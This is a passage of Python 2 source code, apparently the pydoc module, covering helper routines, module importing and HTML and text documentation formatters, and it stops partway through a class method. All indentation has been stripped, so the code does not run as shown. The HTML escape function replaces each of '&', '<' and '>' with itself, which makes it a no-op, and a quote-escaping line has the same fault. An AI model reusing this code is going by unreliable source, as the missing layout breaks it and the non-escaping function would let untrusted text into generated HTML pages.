__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from collections import deque
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
if _re_stripid.search(repr(Exception)):
return _re_stripid.sub(r'\1', text)
return text
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
if name in ['__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__']: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ['.py', '.pyc', '.pyo']:
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
file = open(filename)
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = split(module.__doc__ or '', '\n')[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, (exc, value, tb)):
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
if forceload and path in sys.modules:
# This is the only way to be sure. Checking the mtime of the file
# isn't good enough (e.g. what if the module contains a class that
# inherits from another module that has changed?).
if path not in sys.builtin_module_names:
# Python never loads a dynamic extension a second time from the
# same path, even if the file is changed or missing. Deleting
# the entry in sys.modules doesn't help for dynamic extensions,
# so we're not even going to try to keep them up to date.
info = inspect.getmoduleinfo(sys.modules[path].__file__)
if info[3] != imp.C_EXTENSION:
cache[path] = sys.modules[path] # prevent module from clearing
del sys.modules[path]
try:
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occured while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and \
split(lower(str(value)))[:2] == ['no', 'module']:
# The module was not found.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://www.python.org/doc/current/lib")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages'))))):
htmlfile = "module-%s.html" % object.__name__
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), htmlfile)
else:
docloc = os.path.join(docloc, htmlfile)
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!doctype html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)/cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100/cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, (name, path, ispackage, shadowed)):
"""Make a link for a module or package to display in an index."""
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/peps/pep-%04d.html' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
modnames = []
for file in os.listdir(object.__path__[0]):
path = os.path.join(object.__path__[0], file)
modname = inspect.getmodulename(file)
if modname != '__init__':
if modname and modname not in modnames:
modpkgs.append((modname, name, 0, 0))
modnames.append(modname)
elif ispackage(path):
modpkgs.append((file, name, 1, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda (key, value), s=self: s.modulelink(value))
result = result + self.bigsection(
'Modules', '#fffff', '#aa55cc', contents)
if classes:
classlist = map(lambda (key, value): value, classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spillproperties(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docproperty(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if callable(value) or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda (name, kind, cls, value): visiblename(name),
inspect.classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
attrs.sort(key=lambda t: t[0])
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spillproperties('Properties %s' % tag, attrs,
lambda t: t[1] == 'property')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docproperty(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
for attr, tag in [('fget', '<em>get</em>'),
('fset', '<em>set</em>'),
('fdel', '<em>delete</em>')]:
func = getattr(value, attr)
if func is not None:
base = self.document(func, tag, mod)
push('<dd>%s</dd>\n' % base)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docproperty(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
seen = {}
files = os.listdir(dir)
def found(name, ispackage,
modpkgs=modpkgs, shadowed=shadowed, seen=seen):
if name not in seen:
modpkgs.append((name, '', ispackage, name in shadowed))
seen[name] = 1
shadowed[name] = 1
# Package spam/__init__.py takes precedence over module spam.py.
for file in files:
path = os.path.join(dir, file)
if ispackage(path): found(file, 1)
for file in files:
path = os.path.join(dir, file)
if os.path.isfile(path):
modname = inspect.getmodulename(file)
if modname: found(modname, 0)
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
if hasattr(object, '__path__'):
modpkgs = []
for file in os.listdir(object.__path__[0]):
path = os.path.join(object.__path__[0], file)
modname = inspect.getmodulename(file)
if modname != '__init__':
if modname and modname not in modpkgs:
modpkgs.append(modname)
elif ispackage(path):
modpkgs.append(file + ' (package)')
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
if classes:
classlist = map(lambda (key, value): value, classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, 70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spillproperties(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docproperty(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if callable(value) or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, 70, doc) + '\n')
return attrs
attrs = filter(lambda (name, kind, cls, value): visiblename(name),
inspect.classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
